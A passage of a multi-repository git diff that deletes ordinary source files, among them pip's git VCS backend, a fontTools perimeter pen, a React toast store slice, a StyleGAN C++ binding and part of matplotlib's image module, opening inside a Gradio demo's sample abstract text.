Highlights are short sentences used to annotate scientific papers. They complement the abstract content by conveying the main result findings. To automate the process of paper annotation, highlights extraction aims at extracting from 3 to 5 paper sentences via supervised learning. Existing approaches rely on ad hoc linguistic features, which depend on the analyzed context, and apply recurrent neural networks, which are not effective in learning long-range text dependencies. 
This paper leverages the attention mechanism adopted in transformer models to improve the accuracy of sentence relevance estimation. Unlike existing approaches, it relies on the end-to-end training of a deep regression model. To attend patterns relevant to highlights content it also enriches sentence encodings with a section-level contextualization. The experimental results, achieved on three different benchmark datasets, show that the designed architecture is able to achieve significant performance improvements compared to the state-of-the-art. "] -] - -demo = gr.Interface( - fn=generate, - inputs=gr.inputs.Textbox(lines=10, - label="Input Text"), - outputs=gr.outputs.Textbox(label="Generated Text"), - examples=examples -) - -demo.launch() diff --git a/spaces/pkiage/fast_arbitrary_image_style_transfer/src/model/__init__.py b/spaces/pkiage/fast_arbitrary_image_style_transfer/src/model/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py deleted file mode 100644 index 8d1d499376744954308bdf96f80e5b5a39a24195..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/vcs/git.py +++ /dev/null @@ -1,526 +0,0 @@ -import logging -import os.path -import pathlib -import re -import urllib.parse -import urllib.request -from typing import List, Optional, Tuple - -from pip._internal.exceptions import BadCommand, InstallationError -from pip._internal.utils.misc import HiddenText, display_path, hide_url -from pip._internal.utils.subprocess import make_command -from pip._internal.vcs.versioncontrol import ( - AuthInfo, - RemoteNotFoundError, - RemoteNotValidError, - RevOptions, - VersionControl, - find_path_to_project_root_from_repo_root, - vcs, -) - -urlsplit = urllib.parse.urlsplit -urlunsplit = urllib.parse.urlunsplit - - -logger = logging.getLogger(__name__) - - -GIT_VERSION_REGEX = re.compile( - r"^git version " # Prefix. - r"(\d+)" # Major. - r"\.(\d+)" # Dot, minor. - r"(?:\.(\d+))?" # Optional dot, patch. - r".*$" # Suffix, including any pre- and post-release segments we don't care about. -) - -HASH_REGEX = re.compile("^[a-fA-F0-9]{40}$") - -# SCP (Secure copy protocol) shorthand. e.g. 'git@example.com:foo/bar.git' -SCP_REGEX = re.compile( - r"""^ - # Optional user, e.g. 'git@' - (\w+@)? - # Server, e.g. 'github.com'. - ([^/:]+): - # The server-side path. e.g. 'user/project.git'. Must start with an - # alphanumeric character so as not to be confusable with a Windows paths - # like 'C:/foo/bar' or 'C:\foo\bar'. 
- (\w[^:]*) - $""", - re.VERBOSE, -) - - -def looks_like_hash(sha: str) -> bool: - return bool(HASH_REGEX.match(sha)) - - -class Git(VersionControl): - name = "git" - dirname = ".git" - repo_name = "clone" - schemes = ( - "git+http", - "git+https", - "git+ssh", - "git+git", - "git+file", - ) - # Prevent the user's environment variables from interfering with pip: - # https://github.com/pypa/pip/issues/1130 - unset_environ = ("GIT_DIR", "GIT_WORK_TREE") - default_arg_rev = "HEAD" - - @staticmethod - def get_base_rev_args(rev: str) -> List[str]: - return [rev] - - def is_immutable_rev_checkout(self, url: str, dest: str) -> bool: - _, rev_options = self.get_url_rev_options(hide_url(url)) - if not rev_options.rev: - return False - if not self.is_commit_id_equal(dest, rev_options.rev): - # the current commit is different from rev, - # which means rev was something else than a commit hash - return False - # return False in the rare case rev is both a commit hash - # and a tag or a branch; we don't want to cache in that case - # because that branch/tag could point to something else in the future - is_tag_or_branch = bool(self.get_revision_sha(dest, rev_options.rev)[0]) - return not is_tag_or_branch - - def get_git_version(self) -> Tuple[int, ...]: - version = self.run_command( - ["version"], - command_desc="git version", - show_stdout=False, - stdout_only=True, - ) - match = GIT_VERSION_REGEX.match(version) - if not match: - logger.warning("Can't parse git version: %s", version) - return () - return tuple(int(c) for c in match.groups()) - - @classmethod - def get_current_branch(cls, location: str) -> Optional[str]: - """ - Return the current branch, or None if HEAD isn't at a branch - (e.g. detached HEAD). - """ - # git-symbolic-ref exits with empty stdout if "HEAD" is a detached - # HEAD rather than a symbolic ref. In addition, the -q causes the - # command to exit with status code 1 instead of 128 in this case - # and to suppress the message to stderr. - args = ["symbolic-ref", "-q", "HEAD"] - output = cls.run_command( - args, - extra_ok_returncodes=(1,), - show_stdout=False, - stdout_only=True, - cwd=location, - ) - ref = output.strip() - - if ref.startswith("refs/heads/"): - return ref[len("refs/heads/") :] - - return None - - @classmethod - def get_revision_sha(cls, dest: str, rev: str) -> Tuple[Optional[str], bool]: - """ - Return (sha_or_none, is_branch), where sha_or_none is a commit hash - if the revision names a remote branch or tag, otherwise None. - - Args: - dest: the repository directory. - rev: the revision name. - """ - # Pass rev to pre-filter the list. - output = cls.run_command( - ["show-ref", rev], - cwd=dest, - show_stdout=False, - stdout_only=True, - on_returncode="ignore", - ) - refs = {} - # NOTE: We do not use splitlines here since that would split on other - # unicode separators, which can be maliciously used to install a - # different revision. - for line in output.strip().split("\n"): - line = line.rstrip("\r") - if not line: - continue - try: - ref_sha, ref_name = line.split(" ", maxsplit=2) - except ValueError: - # Include the offending line to simplify troubleshooting if - # this error ever occurs. 
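# For reference, each line that parses cleanly has the form
#   "<40-hex-char sha> <ref name>"
# e.g. "1111111111111111111111111111111111111111 refs/remotes/origin/main"
# (the sha above is purely illustrative); anything else lands in this branch.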
- raise ValueError(f"unexpected show-ref line: {line!r}") - - refs[ref_name] = ref_sha - - branch_ref = f"refs/remotes/origin/{rev}" - tag_ref = f"refs/tags/{rev}" - - sha = refs.get(branch_ref) - if sha is not None: - return (sha, True) - - sha = refs.get(tag_ref) - - return (sha, False) - - @classmethod - def _should_fetch(cls, dest: str, rev: str) -> bool: - """ - Return true if rev is a ref or is a commit that we don't have locally. - - Branches and tags are not considered in this method because they are - assumed to be always available locally (which is a normal outcome of - ``git clone`` and ``git fetch --tags``). - """ - if rev.startswith("refs/"): - # Always fetch remote refs. - return True - - if not looks_like_hash(rev): - # Git fetch would fail with abbreviated commits. - return False - - if cls.has_commit(dest, rev): - # Don't fetch if we have the commit locally. - return False - - return True - - @classmethod - def resolve_revision( - cls, dest: str, url: HiddenText, rev_options: RevOptions - ) -> RevOptions: - """ - Resolve a revision to a new RevOptions object with the SHA1 of the - branch, tag, or ref if found. - - Args: - rev_options: a RevOptions object. - """ - rev = rev_options.arg_rev - # The arg_rev property's implementation for Git ensures that the - # rev return value is always non-None. - assert rev is not None - - sha, is_branch = cls.get_revision_sha(dest, rev) - - if sha is not None: - rev_options = rev_options.make_new(sha) - rev_options.branch_name = rev if is_branch else None - - return rev_options - - # Do not show a warning for the common case of something that has - # the form of a Git commit hash. - if not looks_like_hash(rev): - logger.warning( - "Did not find branch or tag '%s', assuming revision or ref.", - rev, - ) - - if not cls._should_fetch(dest, rev): - return rev_options - - # fetch the requested revision - cls.run_command( - make_command("fetch", "-q", url, rev_options.to_args()), - cwd=dest, - ) - # Change the revision to the SHA of the ref we fetched - sha = cls.get_revision(dest, rev="FETCH_HEAD") - rev_options = rev_options.make_new(sha) - - return rev_options - - @classmethod - def is_commit_id_equal(cls, dest: str, name: Optional[str]) -> bool: - """ - Return whether the current commit hash equals the given name. - - Args: - dest: the repository directory. - name: a string name. - """ - if not name: - # Then avoid an unnecessary subprocess call. - return False - - return cls.get_revision(dest) == name - - def fetch_new( - self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int - ) -> None: - rev_display = rev_options.to_display() - logger.info("Cloning %s%s to %s", url, rev_display, display_path(dest)) - if verbosity <= 0: - flags: Tuple[str, ...] = ("--quiet",) - elif verbosity == 1: - flags = () - else: - flags = ("--verbose", "--progress") - if self.get_git_version() >= (2, 17): - # Git added support for partial clone in 2.17 - # https://git-scm.com/docs/partial-clone - # Speeds up cloning by functioning without a complete copy of repository - self.run_command( - make_command( - "clone", - "--filter=blob:none", - *flags, - url, - dest, - ) - ) - else: - self.run_command(make_command("clone", *flags, url, dest)) - - if rev_options.rev: - # Then a specific revision was requested. 
- rev_options = self.resolve_revision(dest, url, rev_options) - branch_name = getattr(rev_options, "branch_name", None) - logger.debug("Rev options %s, branch_name %s", rev_options, branch_name) - if branch_name is None: - # Only do a checkout if the current commit id doesn't match - # the requested revision. - if not self.is_commit_id_equal(dest, rev_options.rev): - cmd_args = make_command( - "checkout", - "-q", - rev_options.to_args(), - ) - self.run_command(cmd_args, cwd=dest) - elif self.get_current_branch(dest) != branch_name: - # Then a specific branch was requested, and that branch - # is not yet checked out. - track_branch = f"origin/{branch_name}" - cmd_args = [ - "checkout", - "-b", - branch_name, - "--track", - track_branch, - ] - self.run_command(cmd_args, cwd=dest) - else: - sha = self.get_revision(dest) - rev_options = rev_options.make_new(sha) - - logger.info("Resolved %s to commit %s", url, rev_options.rev) - - #: repo may contain submodules - self.update_submodules(dest) - - def switch(self, dest: str, url: HiddenText, rev_options: RevOptions) -> None: - self.run_command( - make_command("config", "remote.origin.url", url), - cwd=dest, - ) - cmd_args = make_command("checkout", "-q", rev_options.to_args()) - self.run_command(cmd_args, cwd=dest) - - self.update_submodules(dest) - - def update(self, dest: str, url: HiddenText, rev_options: RevOptions) -> None: - # First fetch changes from the default remote - if self.get_git_version() >= (1, 9): - # fetch tags in addition to everything else - self.run_command(["fetch", "-q", "--tags"], cwd=dest) - else: - self.run_command(["fetch", "-q"], cwd=dest) - # Then reset to wanted revision (maybe even origin/master) - rev_options = self.resolve_revision(dest, url, rev_options) - cmd_args = make_command("reset", "--hard", "-q", rev_options.to_args()) - self.run_command(cmd_args, cwd=dest) - #: update submodules - self.update_submodules(dest) - - @classmethod - def get_remote_url(cls, location: str) -> str: - """ - Return URL of the first remote encountered. - - Raises RemoteNotFoundError if the repository does not have a remote - url configured. - """ - # We need to pass 1 for extra_ok_returncodes since the command - # exits with return code 1 if there are no matching lines. - stdout = cls.run_command( - ["config", "--get-regexp", r"remote\..*\.url"], - extra_ok_returncodes=(1,), - show_stdout=False, - stdout_only=True, - cwd=location, - ) - remotes = stdout.splitlines() - try: - found_remote = remotes[0] - except IndexError: - raise RemoteNotFoundError - - for remote in remotes: - if remote.startswith("remote.origin.url "): - found_remote = remote - break - url = found_remote.split(" ")[1] - return cls._git_remote_to_pip_url(url.strip()) - - @staticmethod - def _git_remote_to_pip_url(url: str) -> str: - """ - Convert a remote url from what git uses to what pip accepts. - - There are 3 legal forms **url** may take: - - 1. A fully qualified url: ssh://git@example.com/foo/bar.git - 2. A local project.git folder: /path/to/bare/repository.git - 3. SCP shorthand for form 1: git@example.com:foo/bar.git - - Form 1 is output as-is. Form 2 must be converted to URI and form 3 must - be converted to form 1. - - See the corresponding test test_git_remote_url_to_pip() for examples of - sample inputs/outputs. - """ - if re.match(r"\w+://", url): - # This is already valid. Pass it though as-is. - return url - if os.path.exists(url): - # A local bare remote (git clone --mirror). - # Needs a file:// prefix. 
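# Illustrative only (the path is a made-up example, not one from this codebase):
# an absolute bare-repo path such as /srv/repos/project.git comes out of
# as_uri() as file:///srv/repos/project.git.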
- return pathlib.PurePath(url).as_uri() - scp_match = SCP_REGEX.match(url) - if scp_match: - # Add an ssh:// prefix and replace the ':' with a '/'. - return scp_match.expand(r"ssh://\1\2/\3") - # Otherwise, bail out. - raise RemoteNotValidError(url) - - @classmethod - def has_commit(cls, location: str, rev: str) -> bool: - """ - Check if rev is a commit that is available in the local repository. - """ - try: - cls.run_command( - ["rev-parse", "-q", "--verify", "sha^" + rev], - cwd=location, - log_failed_cmd=False, - ) - except InstallationError: - return False - else: - return True - - @classmethod - def get_revision(cls, location: str, rev: Optional[str] = None) -> str: - if rev is None: - rev = "HEAD" - current_rev = cls.run_command( - ["rev-parse", rev], - show_stdout=False, - stdout_only=True, - cwd=location, - ) - return current_rev.strip() - - @classmethod - def get_subdirectory(cls, location: str) -> Optional[str]: - """ - Return the path to Python project root, relative to the repo root. - Return None if the project root is in the repo root. - """ - # find the repo root - git_dir = cls.run_command( - ["rev-parse", "--git-dir"], - show_stdout=False, - stdout_only=True, - cwd=location, - ).strip() - if not os.path.isabs(git_dir): - git_dir = os.path.join(location, git_dir) - repo_root = os.path.abspath(os.path.join(git_dir, "..")) - return find_path_to_project_root_from_repo_root(location, repo_root) - - @classmethod - def get_url_rev_and_auth(cls, url: str) -> Tuple[str, Optional[str], AuthInfo]: - """ - Prefixes stub URLs like 'user@hostname:user/repo.git' with 'ssh://'. - That's required because although they use SSH they sometimes don't - work with a ssh:// scheme (e.g. GitHub). But we need a scheme for - parsing. Hence we remove it again afterwards and return it as a stub. 
- """ - # Works around an apparent Git bug - # (see https://article.gmane.org/gmane.comp.version-control.git/146500) - scheme, netloc, path, query, fragment = urlsplit(url) - if scheme.endswith("file"): - initial_slashes = path[: -len(path.lstrip("/"))] - newpath = initial_slashes + urllib.request.url2pathname(path).replace( - "\\", "/" - ).lstrip("/") - after_plus = scheme.find("+") + 1 - url = scheme[:after_plus] + urlunsplit( - (scheme[after_plus:], netloc, newpath, query, fragment), - ) - - if "://" not in url: - assert "file:" not in url - url = url.replace("git+", "git+ssh://") - url, rev, user_pass = super().get_url_rev_and_auth(url) - url = url.replace("ssh://", "") - else: - url, rev, user_pass = super().get_url_rev_and_auth(url) - - return url, rev, user_pass - - @classmethod - def update_submodules(cls, location: str) -> None: - if not os.path.exists(os.path.join(location, ".gitmodules")): - return - cls.run_command( - ["submodule", "update", "--init", "--recursive", "-q"], - cwd=location, - ) - - @classmethod - def get_repository_root(cls, location: str) -> Optional[str]: - loc = super().get_repository_root(location) - if loc: - return loc - try: - r = cls.run_command( - ["rev-parse", "--show-toplevel"], - cwd=location, - show_stdout=False, - stdout_only=True, - on_returncode="raise", - log_failed_cmd=False, - ) - except BadCommand: - logger.debug( - "could not determine if %s is under git control " - "because git is not available", - location, - ) - return None - except InstallationError: - return None - return os.path.normpath(r.rstrip("\r\n")) - - @staticmethod - def should_add_vcs_url_prefix(repo_url: str) -> bool: - """In either https or ssh form, requirements must be prefixed with git+.""" - return True - - -vcs.register(Git) diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py deleted file mode 100644 index bf6db104a2c4fd4f3dc699e85f2b262c3d31e9a0..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/themes.py +++ /dev/null @@ -1,5 +0,0 @@ -from .default_styles import DEFAULT_STYLES -from .theme import Theme - - -DEFAULT = Theme(DEFAULT_STYLES) diff --git a/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts b/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts deleted file mode 100644 index e3a9d807e16a262ef3de002a816f7a9c0a9d8b45..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/store/toast-slice.ts +++ /dev/null @@ -1,26 +0,0 @@ -import { ToastStatus } from '@components/Toast/Toast'; -import { StoreSlice } from './store'; - -export interface ToastSlice { - toastShow: boolean; - toastMessage: string; - toastStatus: ToastStatus; - setToastShow: (toastShow: boolean) => void; - setToastMessage: (toastMessage: string) => void; - setToastStatus: (toastStatus: ToastStatus) => void; -} - -export const createToastSlice: StoreSlice = (set, get) => ({ - toastShow: false, - toastMessage: '', - toastStatus: 'success', - setToastShow: (toastShow: boolean) => { - set((prev) => ({ ...prev, toastShow })); - }, - setToastMessage: (toastMessage: string) => { - set((prev: ToastSlice) => ({ ...prev, toastMessage })); - }, - setToastStatus: (toastStatus: ToastStatus) => { - set((prev: ToastSlice) => ({ ...prev, toastStatus })); - }, -}); diff --git a/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp 
b/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp deleted file mode 100644 index d2e633dc896433c205e18bc3e455539192ff968e..0000000000000000000000000000000000000000 --- a/spaces/power2/JoJoGan-powerhow2/e4e/models/stylegan2/op/upfirdn2d.cpp +++ /dev/null @@ -1,23 +0,0 @@ -#include - - -torch::Tensor upfirdn2d_op(const torch::Tensor& input, const torch::Tensor& kernel, - int up_x, int up_y, int down_x, int down_y, - int pad_x0, int pad_x1, int pad_y0, int pad_y1); - -#define CHECK_CUDA(x) TORCH_CHECK(x.type().is_cuda(), #x " must be a CUDA tensor") -#define CHECK_CONTIGUOUS(x) TORCH_CHECK(x.is_contiguous(), #x " must be contiguous") -#define CHECK_INPUT(x) CHECK_CUDA(x); CHECK_CONTIGUOUS(x) - -torch::Tensor upfirdn2d(const torch::Tensor& input, const torch::Tensor& kernel, - int up_x, int up_y, int down_x, int down_y, - int pad_x0, int pad_x1, int pad_y0, int pad_y1) { - CHECK_CUDA(input); - CHECK_CUDA(kernel); - - return upfirdn2d_op(input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1); -} - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) { - m.def("upfirdn2d", &upfirdn2d, "upfirdn2d (CUDA)"); -} \ No newline at end of file diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py deleted file mode 100644 index efb2b2d14cc46dc51ff795cf7a1fb95bd6d63673..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py +++ /dev/null @@ -1,69 +0,0 @@ -# -*- coding: utf-8 -*- -"""Calculate the perimeter of a glyph.""" - -from fontTools.pens.basePen import BasePen -from fontTools.misc.bezierTools import ( - approximateQuadraticArcLengthC, - calcQuadraticArcLengthC, - approximateCubicArcLengthC, - calcCubicArcLengthC, -) -import math - - -__all__ = ["PerimeterPen"] - - -def _distance(p0, p1): - return math.hypot(p0[0] - p1[0], p0[1] - p1[1]) - - -class PerimeterPen(BasePen): - def __init__(self, glyphset=None, tolerance=0.005): - BasePen.__init__(self, glyphset) - self.value = 0 - self.tolerance = tolerance - - # Choose which algorithm to use for quadratic and for cubic. - # Quadrature is faster but has fixed error characteristic with no strong - # error bound. The cutoff points are derived empirically. 
- self._addCubic = ( - self._addCubicQuadrature if tolerance >= 0.0015 else self._addCubicRecursive - ) - self._addQuadratic = ( - self._addQuadraticQuadrature - if tolerance >= 0.00075 - else self._addQuadraticExact - ) - - def _moveTo(self, p0): - self.__startPoint = p0 - - def _closePath(self): - p0 = self._getCurrentPoint() - if p0 != self.__startPoint: - self._lineTo(self.__startPoint) - - def _lineTo(self, p1): - p0 = self._getCurrentPoint() - self.value += _distance(p0, p1) - - def _addQuadraticExact(self, c0, c1, c2): - self.value += calcQuadraticArcLengthC(c0, c1, c2) - - def _addQuadraticQuadrature(self, c0, c1, c2): - self.value += approximateQuadraticArcLengthC(c0, c1, c2) - - def _qCurveToOne(self, p1, p2): - p0 = self._getCurrentPoint() - self._addQuadratic(complex(*p0), complex(*p1), complex(*p2)) - - def _addCubicRecursive(self, c0, c1, c2, c3): - self.value += calcCubicArcLengthC(c0, c1, c2, c3, self.tolerance) - - def _addCubicQuadrature(self, c0, c1, c2, c3): - self.value += approximateCubicArcLengthC(c0, c1, c2, c3) - - def _curveToOne(self, p1, p2, p3): - p0 = self._getCurrentPoint() - self._addCubic(complex(*p0), complex(*p1), complex(*p2), complex(*p3)) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py deleted file mode 100644 index 1323b670d0c2e7a51e553ee8aa341af789898b1d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/tables/_l_c_a_r.py +++ /dev/null @@ -1,5 +0,0 @@ -from .otBase import BaseTTXConverter - - -class table__l_c_a_r(BaseTTXConverter): - pass diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py deleted file mode 100644 index a3e6208634fafa416b9323f5156ac56dd7bb3700..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/themes/utils/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -from .semver_match import ( - ThemeAsset, - get_matching_version, - get_theme_assets, -) - -__all__ = [ - "ThemeAsset", - "get_theme_assets", - "get_matching_version", -] diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py deleted file mode 100644 index 757f0ba3476e3b74f7da9dc15b64f1a3102f625b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/matplotlib/image.py +++ /dev/null @@ -1,1785 +0,0 @@ -""" -The image module supports basic image loading, rescaling and display -operations. 
-""" - -import math -import os -import logging -from pathlib import Path -import warnings - -import numpy as np -import PIL.Image -import PIL.PngImagePlugin - -import matplotlib as mpl -from matplotlib import _api, cbook, cm -# For clarity, names from _image are given explicitly in this module -from matplotlib import _image -# For user convenience, the names from _image are also imported into -# the image namespace -from matplotlib._image import * -import matplotlib.artist as martist -from matplotlib.backend_bases import FigureCanvasBase -import matplotlib.colors as mcolors -from matplotlib.transforms import ( - Affine2D, BboxBase, Bbox, BboxTransform, BboxTransformTo, - IdentityTransform, TransformedBbox) - -_log = logging.getLogger(__name__) - -# map interpolation strings to module constants -_interpd_ = { - 'antialiased': _image.NEAREST, # this will use nearest or Hanning... - 'none': _image.NEAREST, # fall back to nearest when not supported - 'nearest': _image.NEAREST, - 'bilinear': _image.BILINEAR, - 'bicubic': _image.BICUBIC, - 'spline16': _image.SPLINE16, - 'spline36': _image.SPLINE36, - 'hanning': _image.HANNING, - 'hamming': _image.HAMMING, - 'hermite': _image.HERMITE, - 'kaiser': _image.KAISER, - 'quadric': _image.QUADRIC, - 'catrom': _image.CATROM, - 'gaussian': _image.GAUSSIAN, - 'bessel': _image.BESSEL, - 'mitchell': _image.MITCHELL, - 'sinc': _image.SINC, - 'lanczos': _image.LANCZOS, - 'blackman': _image.BLACKMAN, -} - -interpolations_names = set(_interpd_) - - -def composite_images(images, renderer, magnification=1.0): - """ - Composite a number of RGBA images into one. The images are - composited in the order in which they appear in the *images* list. - - Parameters - ---------- - images : list of Images - Each must have a `make_image` method. For each image, - `can_composite` should return `True`, though this is not - enforced by this function. Each image must have a purely - affine transformation with no shear. - - renderer : `.RendererBase` - - magnification : float, default: 1 - The additional magnification to apply for the renderer in use. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The composited RGBA image. - offset_x, offset_y : float - The (left, bottom) offset where the composited image should be placed - in the output figure. - """ - if len(images) == 0: - return np.empty((0, 0, 4), dtype=np.uint8), 0, 0 - - parts = [] - bboxes = [] - for image in images: - data, x, y, trans = image.make_image(renderer, magnification) - if data is not None: - x *= magnification - y *= magnification - parts.append((data, x, y, image._get_scalar_alpha())) - bboxes.append( - Bbox([[x, y], [x + data.shape[1], y + data.shape[0]]])) - - if len(parts) == 0: - return np.empty((0, 0, 4), dtype=np.uint8), 0, 0 - - bbox = Bbox.union(bboxes) - - output = np.zeros( - (int(bbox.height), int(bbox.width), 4), dtype=np.uint8) - - for data, x, y, alpha in parts: - trans = Affine2D().translate(x - bbox.x0, y - bbox.y0) - _image.resample(data, output, trans, _image.NEAREST, - resample=False, alpha=alpha) - - return output, bbox.x0 / magnification, bbox.y0 / magnification - - -def _draw_list_compositing_images( - renderer, parent, artists, suppress_composite=None): - """ - Draw a sorted list of artists, compositing images into a single - image where possible. - - For internal Matplotlib use only: It is here to reduce duplication - between `Figure.draw` and `Axes.draw`, but otherwise should not be - generally useful. 
- """ - has_images = any(isinstance(x, _ImageBase) for x in artists) - - # override the renderer default if suppressComposite is not None - not_composite = (suppress_composite if suppress_composite is not None - else renderer.option_image_nocomposite()) - - if not_composite or not has_images: - for a in artists: - a.draw(renderer) - else: - # Composite any adjacent images together - image_group = [] - mag = renderer.get_image_magnification() - - def flush_images(): - if len(image_group) == 1: - image_group[0].draw(renderer) - elif len(image_group) > 1: - data, l, b = composite_images(image_group, renderer, mag) - if data.size != 0: - gc = renderer.new_gc() - gc.set_clip_rectangle(parent.bbox) - gc.set_clip_path(parent.get_clip_path()) - renderer.draw_image(gc, round(l), round(b), data) - gc.restore() - del image_group[:] - - for a in artists: - if (isinstance(a, _ImageBase) and a.can_composite() and - a.get_clip_on() and not a.get_clip_path()): - image_group.append(a) - else: - flush_images() - a.draw(renderer) - flush_images() - - -def _resample( - image_obj, data, out_shape, transform, *, resample=None, alpha=1): - """ - Convenience wrapper around `._image.resample` to resample *data* to - *out_shape* (with a third dimension if *data* is RGBA) that takes care of - allocating the output array and fetching the relevant properties from the - Image object *image_obj*. - """ - # AGG can only handle coordinates smaller than 24-bit signed integers, - # so raise errors if the input data is larger than _image.resample can - # handle. - msg = ('Data with more than {n} cannot be accurately displayed. ' - 'Downsampling to less than {n} before displaying. ' - 'To remove this warning, manually downsample your data.') - if data.shape[1] > 2**23: - warnings.warn(msg.format(n='2**23 columns')) - step = int(np.ceil(data.shape[1] / 2**23)) - data = data[:, ::step] - transform = Affine2D().scale(step, 1) + transform - if data.shape[0] > 2**24: - warnings.warn(msg.format(n='2**24 rows')) - step = int(np.ceil(data.shape[0] / 2**24)) - data = data[::step, :] - transform = Affine2D().scale(1, step) + transform - # decide if we need to apply anti-aliasing if the data is upsampled: - # compare the number of displayed pixels to the number of - # the data pixels. - interpolation = image_obj.get_interpolation() - if interpolation == 'antialiased': - # don't antialias if upsampling by an integer number or - # if zooming in more than a factor of 3 - pos = np.array([[0, 0], [data.shape[1], data.shape[0]]]) - disp = transform.transform(pos) - dispx = np.abs(np.diff(disp[:, 0])) - dispy = np.abs(np.diff(disp[:, 1])) - if ((dispx > 3 * data.shape[1] or - dispx == data.shape[1] or - dispx == 2 * data.shape[1]) and - (dispy > 3 * data.shape[0] or - dispy == data.shape[0] or - dispy == 2 * data.shape[0])): - interpolation = 'nearest' - else: - interpolation = 'hanning' - out = np.zeros(out_shape + data.shape[2:], data.dtype) # 2D->2D, 3D->3D. - if resample is None: - resample = image_obj.get_resample() - _image.resample(data, out, transform, - _interpd_[interpolation], - resample, - alpha, - image_obj.get_filternorm(), - image_obj.get_filterrad()) - return out - - -def _rgb_to_rgba(A): - """ - Convert an RGB image to RGBA, as required by the image resample C++ - extension. 
- """ - rgba = np.zeros((A.shape[0], A.shape[1], 4), dtype=A.dtype) - rgba[:, :, :3] = A - if rgba.dtype == np.uint8: - rgba[:, :, 3] = 255 - else: - rgba[:, :, 3] = 1.0 - return rgba - - -class _ImageBase(martist.Artist, cm.ScalarMappable): - """ - Base class for images. - - interpolation and cmap default to their rc settings - - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - extent is data axes (left, right, bottom, top) for making image plots - registered with data plots. Default is to label the pixel - centers with the zero-based row and column indices. - - Additional kwargs are matplotlib.artist properties - """ - zorder = 0 - - def __init__(self, ax, - cmap=None, - norm=None, - interpolation=None, - origin=None, - filternorm=True, - filterrad=4.0, - resample=False, - *, - interpolation_stage=None, - **kwargs - ): - martist.Artist.__init__(self) - cm.ScalarMappable.__init__(self, norm, cmap) - if origin is None: - origin = mpl.rcParams['image.origin'] - _api.check_in_list(["upper", "lower"], origin=origin) - self.origin = origin - self.set_filternorm(filternorm) - self.set_filterrad(filterrad) - self.set_interpolation(interpolation) - self.set_interpolation_stage(interpolation_stage) - self.set_resample(resample) - self.axes = ax - - self._imcache = None - - self._internal_update(kwargs) - - def __str__(self): - try: - shape = self.get_shape() - return f"{type(self).__name__}(shape={shape!r})" - except RuntimeError: - return type(self).__name__ - - def __getstate__(self): - # Save some space on the pickle by not saving the cache. - return {**super().__getstate__(), "_imcache": None} - - def get_size(self): - """Return the size of the image as tuple (numrows, numcols).""" - return self.get_shape()[:2] - - def get_shape(self): - """ - Return the shape of the image as tuple (numrows, numcols, channels). - """ - if self._A is None: - raise RuntimeError('You must first set the image array') - - return self._A.shape - - def set_alpha(self, alpha): - """ - Set the alpha value used for blending - not supported on all backends. - - Parameters - ---------- - alpha : float or 2D array-like or None - """ - martist.Artist._set_alpha_for_array(self, alpha) - if np.ndim(alpha) not in (0, 2): - raise TypeError('alpha must be a float, two-dimensional ' - 'array, or None') - self._imcache = None - - def _get_scalar_alpha(self): - """ - Get a scalar alpha value to be applied to the artist as a whole. - - If the alpha value is a matrix, the method returns 1.0 because pixels - have individual alpha values (see `~._ImageBase._make_image` for - details). If the alpha value is a scalar, the method returns said value - to be applied to the artist as a whole because pixels do not have - individual alpha values. - """ - return 1.0 if self._alpha is None or np.ndim(self._alpha) > 0 \ - else self._alpha - - def changed(self): - """ - Call this whenever the mappable is changed so observers can update. - """ - self._imcache = None - cm.ScalarMappable.changed(self) - - def _make_image(self, A, in_bbox, out_bbox, clip_bbox, magnification=1.0, - unsampled=False, round_to_pixel_border=True): - """ - Normalize, rescale, and colormap the image *A* from the given *in_bbox* - (in data space), to the given *out_bbox* (in pixel space) clipped to - the given *clip_bbox* (also in pixel space), and magnified by the - *magnification* factor. 
